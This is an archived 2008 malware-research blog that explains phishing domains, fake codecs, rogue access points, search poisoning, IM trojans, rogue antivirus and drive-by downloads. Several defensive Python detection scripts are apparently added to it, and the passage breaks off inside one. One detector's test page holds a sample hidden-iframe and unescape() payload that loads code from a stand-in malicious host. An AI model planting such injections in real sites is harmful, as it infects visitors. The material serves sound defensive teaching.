Archive for March, 2008

Welcome!

March 31st, 2008

I am very pleased to see the Malware Diaries now online.

I have been working in the security industry for a little more than two years now. It is definitely a very captivating and challenging place.

The SWAT team here at Paretologic is responsible for Malware Research and Database Updates. Our job is to find the bad stuff floating on the Internet and analyze it in our lab before adding detection signatures to our security products.
We actively seek out malware with a variety of tools, including traps (also known as honeypots), as well as human research.
As you may imagine we get to see a wide variety of threats from simple social engineering attacks to very well crafted exploits.

The malware diaries will tell you various stories about online security. The purpose is to be informative, accessible to the novice and interesting to the expert. My partner in crime Jean Taggart will share the pen with me along the journey.

Feel free to browse as you wish or use the menu on the right side to pick a category. We welcome your feedback.

Enjoy! :)

J. Segura
Computer Security Analyst, Malware Diaries author

——

Hello world!

My name is Jean Taggart and I am a computer security analyst here at Paretologic.

I firmly believe that “patching” the end user is a good thing. That is essentially what we do when we inform someone through our blog postings on the seedier side of the net. When we describe how a scam works, explain how the bad guys are trying to fool users in parting with their hard earned money, we disarm them.

I have seen the threat landscape change dramatically over the past few years: from adware that you could simply uninstall, soon followed by programs that intentionally obfuscated their file names and how they hooked into the registry, and eventually applications that have monitoring processes and exhibit rootkit-like traits.

If we can entertain you at the same time that we inform you on these emerging threats, so much the better.

Jean Taggart
Computer Security Analyst, Malware Diaries co-author

Posted in Uncategorized

Gone Phishing…

March 31st, 2008

More and more sensitive information is exchanged online, so much so that most of the time we don’t even realize it. We log into our email account(s), our bank sites, our eBay account etc. Every time we do that, a transaction happens: we send passwords, usernames or credit card numbers to an external server. Of course, we know why it is so important to choose a strong password, but do we know it is totally useless if we cannot trust the recipient we are sending it to?

That is where anyone can exploit that trust. Phishing is any action taken to fraudulently acquire private information by pretending to be a real and trustworthy entity.

Hackers soon realized how much value there was in phishing scams. Stealing somebody’s credentials can give full access to very private information and basically total control of someone’s life (provided that the person does some online banking, logs into her healthcare site and so on).

There are many ways to carry out a phishing scam. First of all, the victim needs to be contacted in some way. It could be an email that leads you to a fake site, or it could be a typical malware infection that hijacks the web browser and redirects it to fraudulent websites whenever the victim types in the URL or clicks on a bookmark.

Secondly, because the phishing site will be hosted on a different domain than the real one, the hacker needs to trick the user into believing this is the correct URL. A classic example is to slightly modify the domain name. Typos are also commonly used.

Figure 1: phishing site targeting Facebook users. Notice the URL ending in “.cn”

Real: www.google.com
Fake: www.go0gle.com

Real: www.facebook.com
Fake: www.facebook.com.profile.php.id.37122.cn

Another technique, called website forgery, involves the use of scripts to alter the address bar. The legitimate address bar can be closed in order to display a fake one. More simply, JavaScript can be used to display a picture in place of the address bar, so that everything looks legitimate.
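The two tricks listed above (a digit swapped for a letter, and the real brand name buried as a subdomain of an unrelated domain) are both mechanical enough for a defender to check automatically. The following Python script is an added example written for this post, not code from the Malware Diaries or ParetoLogic: it extracts the hostname from a URL, reduces it to its registrable domain (assumed here to be the last two labels, a simplification of the real Public Suffix List), normalizes common digit-for-letter substitutions, and reports why a hostname looks like an impersonation of a brand in a small, constructed allow-list (`KNOWN_BRANDS` and `HOMOGLYPHS` are assumptions for the example).

```python
from urllib.parse import urlsplit

# Hypothetical allow-list: brand keyword -> the genuine registrable domain (constructed).
KNOWN_BRANDS = {"facebook": "facebook.com", "google": "google.com"}

# Digits commonly swapped for look-alike letters in fake domains (go0gle, paypa1, ...).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})


def registrable_domain(hostname: str) -> str:
    """Return the last two labels of a hostname, e.g. '37122.cn'.
    Assumes a two-label public suffix; production code should use the Public Suffix List."""
    labels = hostname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def check_url(url: str) -> dict:
    """Classify a URL as genuine, suspicious (brand impersonation) or unknown."""
    host = (urlsplit(url).hostname or "").lower()
    domain = registrable_domain(host)
    host_normalized = host.translate(HOMOGLYPHS)
    domain_normalized = domain.translate(HOMOGLYPHS)

    brand_hit = None
    for brand, genuine in KNOWN_BRANDS.items():
        if domain == genuine:
            # The part that actually matters (the registered domain) is the real one.
            return {"host": host, "domain": domain, "verdict": "genuine", "findings": []}
        if brand in host_normalized:
            brand_hit = (brand, genuine)

    if brand_hit is None:
        return {"host": host, "domain": domain, "verdict": "unknown", "findings": []}

    brand, genuine = brand_hit
    if domain_normalized == genuine:
        finding = f"homoglyph substitution: '{domain}' reads as '{genuine}'"
    elif genuine in host_normalized:
        # www.facebook.com.profile.php.id.37122.cn: the brand is only a subdomain.
        finding = f"'{genuine}' appears as a subdomain of the real registered domain '{domain}'"
    else:
        finding = f"brand '{brand}' in hostname but registered under '{domain}'"
    return {"host": host, "domain": domain, "verdict": "suspicious", "findings": [finding]}


if __name__ == "__main__":
    for sample in ("http://www.google.com/", "http://www.go0gle.com/",
                   "http://www.facebook.com.profile.php.id.37122.cn/"):
        print(sample, "->", check_url(sample))
```

Run against the four hostnames from the post, the genuine Google URL is accepted, `go0gle.com` is flagged as a homoglyph of `google.com`, and the long Facebook lookalike is reported as being registered under `37122.cn`, the only part of that hostname the browser actually trusts.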

Let’s take the example of a phishing scam targeting Facebook users (Figure 1).

A lookalike page is created that looks identical to the legitimate one. The URL in the address bar is slightly different, but the average user may not notice it. In fact, this page is hosted in China.

Then let’s enter an email address and password in the form. Figure 2 shows the credentials being sent to the phishing server somewhere in China.

Interestingly enough, after the login information is entered, the real Facebook login page is loaded this time. The user might just think she typed something wrong and enter the login again. Now it will work, and most likely the user won’t have noticed a thing.

Figure 2: data transfer between the client and the malware server

Meanwhile, a hacker has received a valid email address that he can use for spam, not to mention that he can log into the Facebook account at any time. However, with a bit of luck, there is something even better he can get access to: a lot of people use the same password for the different services they log into.

Now the hacker gets into your personal email account. Because of the large storage available, people don’t bother deleting old emails. This is a gold mine for hackers: a simple keyword search (“password”, “credit card”, “confidential”) turns up even more juicy stuff.

The conclusion to this story is that phishing is a real and dangerous online threat. Although efforts are being made to protect users, the problem is so large that no single solution can fix it. Internet Explorer 7 does include a filter capable of detecting phishing sites, but it’s not 100% trustworthy. There are public groups combating phishing, reporting live stats and taking sites down. The PIRT (Phishing Incident Reporting and Termination) team at Castlecops.com is one of them doing a very good job.

Ultimately, this is something users will have to become familiar with, and they will have to be more vigilant. Effectively blocking spam emails, which are full of phishing scams, would be a good start. Browser add-ons or applications running in the background can also detect dangerous websites in real time and block them.

Jerome Segura

Posted in Phishing

Codec invasion

March 31st, 2008

A codec is a program needed to play certain types of media files. You may have come to know them when you downloaded a movie but couldn’t play it because a codec was required. Popular formats such as DivX require certain software for playback. The advantage of codecs is that they usually let you play high quality media files while keeping their size much smaller than Windows’ default WMV format.

Some websites use special codecs to stream video; YouTube uses Flash to stream theirs. The major players like Apple or Sony also use proprietary formats. The problem is we are flooded with tons of file formats, codecs, etc. To watch the latest YouTube video on your iPod, you need special tools to convert the media into something it can read.

I guess malware authors saw this as an opportunity to launch their own codecs nicely bundled with nasty Trojans. They focus on pornographic content, a good bait that will work on a large scale.

Hackers trick the user into installing the codec in order to view the video. Once installed, the codec launches its payload: an explosion of pop-ups, rootkits and fake anti-spyware programs which bring the machine to a crawl.


Figure 1: after installing a fake codec

A common trick is to use YouTube-like content: logos, a YouTube-style video player… It makes users feel more at home and gives them the impression they’re doing something familiar.


Figure 2: YouTube knock-off


Figure 3: a familiar player with a prompt for a codec download


Figure 4: the codec installer which bundles Trojans

Those codecs are created on demand, so to speak. Each time you visit the webpage, a new identifier is created (Figure 5).


Figure 5: URL changes constantly

In order to avoid signature detection by AV products, the codecs are repacked so that every download has a different MD5. MD5 is a cryptographic hash function used to check the integrity of files; an MD5 hash consists of 32 hexadecimal characters (e.g. F57E5CAE3AA7E90BD79D18720FFC6C58).


Figure 6: md5 signatures are different for each codec

A traditional AV product will look up the file’s MD5 and, if it doesn’t find it, the file will be allowed to execute. It’s nearly impossible to keep up with the production of new malware samples, and logically it doesn’t really make sense to bloat a database with millions of MD5s.

That’s where heuristic detection can come in handy. It is not based on precise identification but looks at different aspects of the binary. For example, unusual settings in the headers of a Windows executable may indicate a possible sign of malware. This technique has drawbacks though, because of the risk of false positives: it is very easy to wrongly identify legitimate files as bad.

Real-time blocking can help as well, by stopping a process from doing things that may affect the system. Once again, it requires a lot of fine tuning to avoid false positives.
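To make the MD5-versus-heuristics trade-off concrete, here is an added Python example (written for this post; it is not ParetoLogic code and not a real detection engine). It builds two constructed PE-like images with the same section table, the second one padded with a few extra bytes the way a re-packed download would differ, and shows that an MD5 blocklist built from the first download misses the second, while a toy header heuristic flags both for the same reasons and leaves a conventionally laid-out benign image alone. `build_pe`, the packer section names and the three heuristics are assumptions for illustration; real engines use many more signals and tune them against false positives.

```python
import hashlib
import struct

# A few well-known packer section names (non-exhaustive; UPX0/UPX1 belong to UPX).
# Note that UPX also packs plenty of legitimate software: this alone is weak evidence.
PACKER_SECTION_NAMES = {"UPX0", "UPX1", ".aspack", ".petite"}


def build_pe(sections):
    """Build a minimal PE-like image for testing (constructed data, not a runnable executable):
    a 64-byte DOS header whose e_lfanew points at 'PE\\0\\0', a 20-byte COFF header with an
    empty optional header, then one 40-byte section header per (name, virtual_size, raw_size)."""
    e_lfanew = 64
    dos_header = b"MZ" + b"\x00" * 58 + struct.pack("<I", e_lfanew)   # e_lfanew lives at 0x3C
    coff_header = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    table = b""
    for name, virtual_size, raw_size in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode("latin-1").ljust(8, b"\x00"),
                             virtual_size, 0x1000, raw_size, 0x400, 0, 0, 0, 0, 0x60000020)
    return dos_header + b"PE\x00\x00" + coff_header + table


def parse_sections(data: bytes):
    """Walk the PE headers and return [(name, virtual_size, raw_size), ...]."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_header_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_header_size
    sections = []
    for i in range(num_sections):
        raw_name, virtual_size, _, raw_size = struct.unpack_from("<8sIII", data, table + 40 * i)
        sections.append((raw_name.rstrip(b"\x00").decode("latin-1"), virtual_size, raw_size))
    return sections


def header_heuristics(data: bytes):
    """Toy heuristics on the section table: packer names, sections that occupy memory but
    carry no data on disk (unpacked at runtime), and unprintable section names."""
    findings = []
    for name, virtual_size, raw_size in parse_sections(data):
        if name in PACKER_SECTION_NAMES:
            findings.append(f"{name}: packer section name")
        if raw_size == 0 and virtual_size > 0:
            findings.append(f"{name}: no data on disk but {virtual_size:#x} bytes in memory")
        if not all(32 <= b < 127 for b in name.encode("latin-1")):
            findings.append("section name contains non-printable bytes")
    return findings


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def demo():
    benign = build_pe([(".text", 0x1000, 0x1000), (".data", 0x200, 0x200), (".rsrc", 0x300, 0x300)])
    codec_v1 = build_pe([("UPX0", 0x8000, 0), ("UPX1", 0x3000, 0x2E00), ("\x01\x02", 0x100, 0x100)])
    codec_v2 = codec_v1 + b"\x00" * 16   # same program, re-padded: a fresh MD5 for the next download
    blocklist = {md5_hex(codec_v1)}      # signature added after analysing the first download
    return {
        "v1_blocked": md5_hex(codec_v1) in blocklist,
        "v2_blocked": md5_hex(codec_v2) in blocklist,
        "v1_flags": header_heuristics(codec_v1),
        "v2_flags": header_heuristics(codec_v2),
        "benign_flags": header_heuristics(benign),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The second download is invisible to the hash lookup although nothing about its structure changed, which is exactly the gap the post describes; the heuristic result also shows why tuning matters, since the packer-name rule on its own would fire on legitimate UPX-compressed programs.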

The best protection against those fake codecs remains being cautious. Your own judgement is better than any antivirus program. If other users utilize your computer, you can also set them up with guest accounts. Such accounts have limited privileges and act as a shield in front of the Operating System and its core components.

Apple’s Mac is now being targeted by fake video codecs as well. It’s not often we see a crossover to a different platform, but this clearly shows how popular the technique has become.

Jerome Segura

Posted in Fake codecs

Don’t bank over public WiFi.

March 31st, 2008

It’s pretty simple, isn’t it?

Too many times I’ve seen people who connect to their local hot spot, at the coffee shop, log into their bank, and conduct important personal business.

Now, don’t get me wrong, I’m all for the convenience of ubiquitous wireless internet access. I think that there’s nothing quite as cool as looking something up in Google while sipping on my grande-latté-2-pumps-of-vanilla, but online banking credentials have a definite value in the eyes of unscrupulous criminals, and when they are flying through the air, anyone with the necessary knowledge can snatch them.
Admittedly, my paranoia knob, or “security dial”, is set pretty high. Perhaps this is a direct result of working in the security field. Let me elaborate and provide a concrete example in the process. A common ploy, one that is not that technically difficult to achieve, is to sit at a location that has public wireless access with a laptop that has been configured to act as a wireless router and relay the traffic to the legitimate wireless router. This is often referred to as a rogue access point.

Say for example that this location is a coffee shop. In this fictitious example, we’ll call the wireless router Coffee_Free. The malicious criminal would then create a Coffee_Free2 router and simply wait for unsuspecting patrons of the coffee shop to connect to his laptop. He would then intercept all their traffic. Once you have intercepted the traffic generated during a banking transaction, you can dissect it at your leisure and extract the information needed to acquire said banking credentials. The rogue access point is even more effective if the WiFi access at the coffee shop is a paid service, since the rogue access is free and will probably attract more patrons than the legitimate one!
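From the defender’s side, the Coffee_Free / Coffee_Free2 scenario is something a venue (or a cautious laptop owner) can look for in an ordinary wireless scan. The script below is an added example written for this post, not code from the author or ParetoLogic: it takes a constructed list of scan results and a list of the BSSIDs (radio MAC addresses) the venue is assumed to actually operate, and reports any network that either reuses a trusted SSID on an unknown radio (the evil-twin case) or carries a name within a couple of characters of it, noting when such a network is open. The scan data, the trusted list and the distance threshold are assumptions for illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Network:
    ssid: str
    bssid: str          # radio MAC address advertised in beacons
    protected: bool     # False when the network advertises no WPA/WPA2 encryption


# Constructed scan results (not a real capture): the coffee shop's own router plus neighbours.
SCAN = [
    Network("Coffee_Free", "00:11:22:33:44:55", True),
    Network("Coffee_Free", "66:77:88:99:AA:BB", False),   # same name, a radio never seen before
    Network("Coffee_Free2", "CC:DD:EE:FF:00:11", False),  # look-alike name from the post
    Network("Library_Guest", "22:33:44:55:66:77", True),
]

# SSID -> BSSIDs the venue actually operates (assumed to come from the venue or a site survey).
TRUSTED = {"Coffee_Free": {"00:11:22:33:44:55"}}


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch names that differ from a trusted SSID by a character or two."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit(scan, trusted, max_distance=2):
    """Return (ssid, bssid, reason) for every network that impersonates or mimics a trusted SSID."""
    findings = []
    for net in scan:
        for ssid, bssids in trusted.items():
            if net.ssid == ssid and net.bssid.upper() not in bssids:
                findings.append((net.ssid, net.bssid,
                                 "trusted SSID on an unknown BSSID (possible evil twin)"))
            elif net.ssid != ssid and levenshtein(net.ssid.lower(), ssid.lower()) <= max_distance:
                reason = f"name resembles trusted SSID '{ssid}'"
                if not net.protected:
                    reason += " and is open"
                findings.append((net.ssid, net.bssid, reason))
    return findings


if __name__ == "__main__":
    for ssid, bssid, reason in audit(SCAN, TRUSTED):
        print(f"{ssid:14} {bssid}  {reason}")
```

On the constructed scan the second `Coffee_Free` beacon and `Coffee_Free2` are both reported; the library network, which merely happens to be nearby, is not. A BSSID can of course be cloned, so this is a tripwire rather than proof, which is why the post’s advice stands regardless of what the scan shows.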

Figure: rogue access point

Remember, this method of stealing credentials applies to any web-based exchange that involves some form of authentication. Is your favorite instant messenger automatically logging you on? Your credentials are involved in that process. Checking your g-mail? That information is intercepted too…

On the subject of e-mail credentials, don’t think that just because it’s a web-based email, it does not hold value to criminals. If they own your email, they can get access to any other services where you used that email address to register. The g-mail search feature makes finding this information even easier. Users also have the bad habit of using the same password for several different services. A skillful attacker will attempt logging in to other services using the same credentials in a bid to gain further information. We have even seen black hat tools in the wild that help automate this process…

So what should the average user take from this? Don’t bank over public WiFi.

There’s no point in looking for a dodgy looking fellow with a “got root” t-shirt, rubbing his hands together with glee at the very far end of the coffee shop either. His laptop is in his car, in the trunk. It’s parked beside the coffee shop, and he’s gone shopping. Possibly with your money.

Don’t bank over public WiFi.

Posted in Wireless Security

Google poisoning and impersonations

March 31st, 2008

When we look for something on the Internet, most of us will think of using Google’s search engine. Actually, for a lot of people, the Internet starts with a Google search. Google quickly surpassed its competitors and has established itself as the reference for online search.
With a mission of presenting the best results as quickly as possible comes a certain responsibility. Indeed, we, as Internet users, trust Google to guide us to links that are safe and match our search query. That same trust we have when we see the Google logo can easily be exploited by hackers who design Google lookalike templates that look like the original but are in fact dangerous websites.

Should we blame the giant search engine if we land on a malicious page that infects our PC after clicking on one of the links? Legally, we may not, but if this happened too often, we might get fed up and start using another search engine.

There has been a lot of talk recently in the media about Google poisoning. Basically, hackers hijack Google’s search results so that their malicious sites appear in the top ten results. Hackers create tens of thousands of sites specially crafted for Search Engine Optimization which somehow find their way onto the first results page.



Figure 1: malicious page appears on Google. Thousands of those pages can be created in a matter of minutes to flood the other legitimate sites.

To give the search engine credit, Google is trying to remove those links as soon as it can. It also flags a lot of sites as dangerous and prevents you from directly visiting them. Stopbadware.org has done a lot of work listing dangerous sites and giving webmasters explanations and tips.

Lastly, Google is not the only victim of search results poisoning. Microsoft’s Live Search has had its fair share too.



Figure 2: a warning from Google: “This site may harm your computer”

The other problem, although this time totally out of the hands of search engines, is lookalike sites. This paper will not talk about the larger problem that is phishing whose main goal is to capture sensitive information (username/password, credit card number etc.) by using social engineering and other technical subterfuges.



Figure 3: Real Google page



Figure 4: Fake Google page

Let’s take a closer look at the fake Google webpage. Several areas have been changed. Although visually it looks pretty close to the original, the source code clearly shows the work of a hacker: obfuscated JavaScript will try to launch an exploit. Also, as if that was not enough, an add-on is required to do the ‘Google’ search properly. The add-on is actually a Worm that will infect the PC and propagate to other machines.

The icing on the cake (at least for us malware researchers) is the redirection to the AdultFriendFinder website, when clicking on the Sign in link. Normally, this takes you to a page where you put your username and password to log into your Google account. Instead, you will land on an adult site.



Figure 5: Source code for the Fake Google page. Notice the part that says “secret code”… This is obfuscated JavaScript that hides malicious code.



Figure 6: Social engineering trick to download and execute a Worm.



Figure 7: The Sign in link actually redirects you to AdultFriendFinder.com



Figure 8: AdultFriendFinder.com sponsored by a pretty dubious affiliate

It is no big surprise that hackers target Google. Millions of Internet users depend on the search engine every day for their work or personal research. There is also a lot of money involved in Search Engine Optimization (SEO) because businesses heavily rely on being listed by Google. So many tricks have been used (and certainly will keep on being used) to increase a site’s ranking. Better ranking means better traffic, which translates into sales.

Well, hackers are getting really good at SEO, and it opens the door to millions of potential victims. The hackers can then contact the Adware / Rogue companies and make a deal to deliver their products through their ‘sales channels’. It is certainly a bad practice, but again, having a good conscience is not very high on their priority list.

Jerome Segura

Posted in Exploits

Instant Messaging Threats

March 31st, 2008

Instant messaging programs are used at home, at work or on the road and they’re a great way to keep in touch with friends/family, meet new people or just waste time. They are fairly easy to figure out, and people of all ages are on them. The most popular ones are Yahoo! Messenger, Windows Live Messenger (formerly MSN messenger), ICQ, AIM (AOL Instant Messenger). Most feature file transfers, webcam and voice functionalities, as well as traditional text chats.

Every now and again, we hear about the dangers of online predators who, under fake identities, try to lure kids into giving them personal information and more. That is definitely a concern for all parents to have. Kids don’t always realize that there are disturbing and sick people out there, looking for their next victim.

Parents should not only be concerned about their kids, but also themselves, or anyone for that matter. Instant messaging is a very easy way for a person to spread malicious programs very quickly. In a sense it can be compared to email with malicious file attachments or dangerous spam. Both rely on social engineering techniques, which basically means using tricks (free stuff, porn etc.) that people will fall for.

In our SWAT department we researched a little how this all works. We created a “bait” account, which allowed us to advertise ourselves under a typical identity. Rapidly, a lot of people added our profile to their friend lists. Soon, the trap worked its magic and we received our first message:


Figure 1: Infected file transfer

The file sent to us was zipped and contained a Trojan, the kind of program that can infect your PC in many different ways, such as installing a keylogger to secretly capture your keystrokes or modifying your Internet browser to redirect your searches to an affiliate site. You may assume that whoever sent you this instant message is evil. Well, in most cases there was no one in front of the computer at all. An already infected machine can send spam and instant messages automatically, without the user’s knowledge. Such a machine is called a Bot: a compromised PC that is part of a group of PCs (a Botnet) participating in illegal activities.

Another social engineering technique is to send an IM with a link to a malicious website. We also received one sample that we analyzed:


Figure 2: IM with malicious URL

The trick is to get the person to click on the link to see the promised naked photos or whatever the bait is… The site in question hosts malware and will infect most users’ PCs with a drive-by download as soon as they land on it.
Our study would not be complete if the entire infection process wasn’t exposed. Our test machine got infected, and to our surprise and “excitement” we noticed we were sending the same malicious link to all our contacts!

Of course, we quickly stopped this: our experiment was successful enough, and we did not want to be part of a botnet.

Jerome Segura

Posted in IM threats

Rogue Software

March 31st, 2008

Rogue software has taken advantage of the publicity and fears around Spyware and Adware, and relies on convincing or forcing people to buy the product in exchange for getting rid of the problem.
Rogue software is nothing less than a big scam, playing with people’s fears and claiming all sorts of things as long as you purchase their so-called product, because in most cases there is no problem to cure on the PC.

In our SWAT department we have seen countless applications that fit this description.
Some of them are pretty basic and not very well designed at all, while others are very professional looking. Overall, we are impressed by the efforts put into the advertising and how well crafted some of these programs are. Although we feel very sorry for the victims, we can’t help but smile when we see a variant of a popular rogue software with just a new logo but the exact same user interface, or when the Help section is written so poorly that we wonder which nationality the programmer was.

From our experience, we can say these applications basically target two markets: illegal pornography and virus/Adware/Spyware infections.

There are other rogues (registry cleaners and other utilities) but they are not as common. We can distinguish two means of installation: through banners or pop-ups, and forced installations brought by a Trojan Downloader.

Pop-ups and other banner ads:
Advertising is done on all sorts of websites. Even some sites which you’d think are legitimate let it happen. For example, a popular ecard website would generate a pop-up for DriveCleaner on its main page. The pop-up claims that the user’s PC is infected with a dangerous Worm. Although this is totally untrue, a small percentage of people will actually believe it, follow the instructions on screen and end up paying money as well as giving their credit card number to a totally untrusted entity.



Figure 1: pop-up for DriveCleaner

Another type of pop-up frightens the user by claiming that porn material is on his computer. Notice the “Teen (underage?)” in Figure 2, meant to scare the user with the prospect of jail.



Figure 2: pop-up for porn content



Figure 3: pop-up for Privacy Protector

Going one step further, we have noticed instances of pop-ups looking very much like a real Microsoft Windows XP interface.



Figure 4: Pop-up using Microsoft Windows XP style

Lastly, let’s mention that rogues are not affected by the language barrier. We found Winativirus Pro localized in about 10 different languages.

Forced Installations:
This is actually the part that makes our day in SWAT, when a totally unwanted program gets forcefully installed and keeps bugging the user to register. When pop-ups are no longer effective, pushing rogue software through exploits becomes lucrative. A compromised website or a fake video codec may bring the user many unwanted programs, and very often rogue software will be among them.
In the case of a web-based infection, visiting a malicious website will trigger a drive-by download. The threat can download additional malware, and rogues are known to piggy-back on other programs.

Although most malware will run silently (keyloggers, data-stealing Trojans…), it is in the interest of the rogue program to catch the user’s attention: warning messages, pop-ups, a changed desktop wallpaper etc.



Figure 5: A warning from BraveSentry



Figure 6: the current wallpaper gets replaced with a pitch black screen

All these techniques contribute to the sense of panic the user is going to experience. Getting rid of the software manually can be a daunting task. Not only did the program come totally uninvited, it will stay on the PC like fleas would on a dog. This is because malware present on the computer will check periodically for the presence of the unwanted components and, if they are not there, will reinstall them.
Some people will decide to buy the rogue software because they can’t take it any longer. This is obviously a bad decision, as most rogues have absolutely no back-end programming, which basically means there is nothing more than a pretty user interface with big buttons and colours. The product is a fake and totally incapable of doing anything.

Conclusions:

There is no end in sight for rogue software. The list will keep on growing because there is money to be made. The names and logos will change but the same scams are still going to affect many users.



Figure 7: Message from winfixer.com and the infamous rogue called Winfixer… Software out of stock???

Jerome Segura

Posted in Rogue software

The hidden part of the web

March 31st, 2008

The Internet has many facets which are difficult to quickly summarize, but for the most part, people associate it with email, online shopping, blogs, multi-player games and so on…

All those activities are brought to us by a web browser which renders the code used to build each webpage. We rarely ever get to look at what is behind a page. Whether a site is using Java, Flash or is just a plain HTML document doesn’t really matter to us. What we care about is that it looks good and is easy to navigate.
Sometimes an apparently legitimate site will trigger an explosion of pop-ups or bring our computer to a crawl for no apparent reason. The problem is, we didn’t really see what happened because it was done behind our backs.

In this paper we will go deep into the core of a webpage and expose the dangerous code responsible for infecting PCs.
A common expression used by security researchers is ‘drive-by download’. In a nutshell, it means that a download happens without the user’s knowledge. Another popular notion is ‘exploit’, which is a piece of code or commands that takes advantage of a bug or vulnerability in an application or Operating System with the intent to gain control of the machine.
Although a drive-by download is usually triggered by the user’s actions, it is neither done willingly nor wanted. Also, the sequence of actions following a drive-by download can be carried out silently and stealthily to avoid the user’s awareness.

We will focus on browsing the web as the main vector for drive-by downloads. As mentioned earlier, web pages consist of lines of code that are interpreted by the web browser (Internet Explorer, Firefox). Most of the time, the code used is totally legitimate and actually makes the web page more user friendly and gives it many different functionalities. For example, some code will be able to determine what browser the user has, what the screen resolution is, etc. Therefore webpages interact not only on the server side, but also locally on the client side, which is the user’s PC.

IFrames
An Iframe is an HTML element that lets you embed an HTML document within an already existing one. Iframes are often used to insert ads within a webpage. To put it simply, it is what Picture-in-Picture is to the TV. The dimensions of the Iframe can be set manually, which is an important point to mention. Hackers use Iframes as a way to embed a malicious website into a legitimate one.
Because hackers do not wish the users, or even worse the webmaster, to notice them, they usually set the size to 0 for both width and height.


Figure 1: Two IFrames are inserted into the source code of the webpage.

JavaScript Obfuscation
Although Iframes are difficult to spot, malware authors want to make sure they are not detected by search engines and other security tools. One way of doing this is to write a piece of code containing an Iframe and obfuscate it so that it is not easily readable. A lot of webmasters legitimately use obfuscated JavaScript to protect the copyright of their website’s source code. Unfortunately, the browser will decode and execute the code regardless of its intent.


Figure 2: Obfuscated Javascript hides a malicious URL
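Both of the tricks just described, the 0x0 Iframe and the escaped string that is only turned back into markup by `unescape()`, leave traces a scanner can pick up without running the page. The following Python script is an added example written for this post, not code from the Malware Diaries or ParetoLogic. It parses a constructed HTML page containing a visible ad Iframe, a 0x0 Iframe and a script modelled on the “secret code” variable from Figure 5 of the Google post, reports Iframes the user cannot see, decodes quoted strings that are mostly `%XX` escapes, and lists the URLs hidden in the decoded markup. The page content and the `malicious.example` hosts are placeholders constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed page (not a real capture): a visible ad iframe, a 0x0 iframe, and a script that
# rebuilds another hidden iframe from a %XX-escaped string. malicious.example is a placeholder.
SAMPLE_HTML = """<html><body>
<h1>Welcome to our site</h1>
<iframe src="http://ads.example/banner" width="300" height="250"></iframe>
<iframe src="http://malicious.example/exploit" width="0" height="0" frameborder="0"></iframe>
<script type="text/javascript">
var secret_code = "%3Ciframe%20src%3D%22http%3A%2F%2Fmalicious.example%2Fdropper%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E";
document.write(unescape(secret_code));
</script>
</body></html>"""

QUOTED_STRING = re.compile(r'"([^"]*)"')
SRC_URL = re.compile(r'''src=["']?(https?://[^"'\s>]+)''', re.I)


def is_hidden(attrs: dict) -> bool:
    """0x0 or 1x1 dimensions, or CSS that hides the element, mark an iframe the user cannot see."""
    def tiny(value):
        return value is not None and value.strip().rstrip("px") in ("0", "1")
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (tiny(attrs.get("width")) or tiny(attrs.get("height"))
            or "display:none" in style or "visibility:hidden" in style)


class PageScanner(HTMLParser):
    """Collect hidden iframes and the raw text of every <script> block."""
    def __init__(self):
        super().__init__()
        self.hidden_iframes = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "iframe" and is_hidden(attrs):
            self.hidden_iframes.append(attrs.get("src") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def decode_escaped_strings(script: str):
    """Decode quoted strings that are mostly %XX escapes (the unescape() trick) and keep
    those that turn into markup."""
    decoded = []
    for match in QUOTED_STRING.finditer(script):
        text = match.group(1)
        if text.count("%") >= 4:
            candidate = unquote(text)
            if re.search(r"<(iframe|script|object|embed)", candidate, re.I):
                decoded.append(candidate)
    return decoded


def scan_html(html: str) -> dict:
    parser = PageScanner()
    parser.feed(html)
    decoded = [d for script in parser.scripts for d in decode_escaped_strings(script)]
    return {
        "hidden_iframes": parser.hidden_iframes,
        "decoded_markup": decoded,
        "decoded_urls": [u for d in decoded for u in SRC_URL.findall(d)],
    }


if __name__ == "__main__":
    for key, value in scan_html(SAMPLE_HTML).items():
        print(key, value)
```

On the sample page the 300x250 ad is left alone, the 0x0 Iframe is reported with its source, and the `secret_code` string decodes to a second hidden Iframe pointing at `http://malicious.example/dropper`. Real obfuscation layers `eval`, string splitting and arithmetic on top of this, so a static decoder like this one catches only the simplest variant; the post’s point stands that the browser will happily decode whatever the page throws at it.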

Other JavaScript malicious code
JavaScript enables a malware author to run malicious code on the victim’s computer. One example of this security problem is cross-site scripting. It happens when an attacker can force a legitimate site to include a malicious script in the page presented to the current victim. (Note that the same website, accessed by a different person on another computer, serves its normal content; this is different from a permanent Iframe infection that affects everyone accessing the site.)

For example, if a user logs into his online banking website and at the same time opens up another webpage, that second page can load malicious code and take control of the banking website.
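The way a legitimate site ends up including an attacker’s script is usually that it echoes something the attacker controls (a search term, a message, a URL parameter) straight into its HTML. As an added example, not code from the post or from ParetoLogic, here is a tiny Python rendering function in its vulnerable and hardened forms, with a constructed payload of the kind a malicious link could carry; the template, the check and the payload are assumptions for illustration.

```python
import html
from urllib.parse import quote

# Page skeleton for a hypothetical search-results page (constructed for this example).
TEMPLATE = '<p>Results for: {}</p>\n<a href="/search?q={}">Search again</a>'


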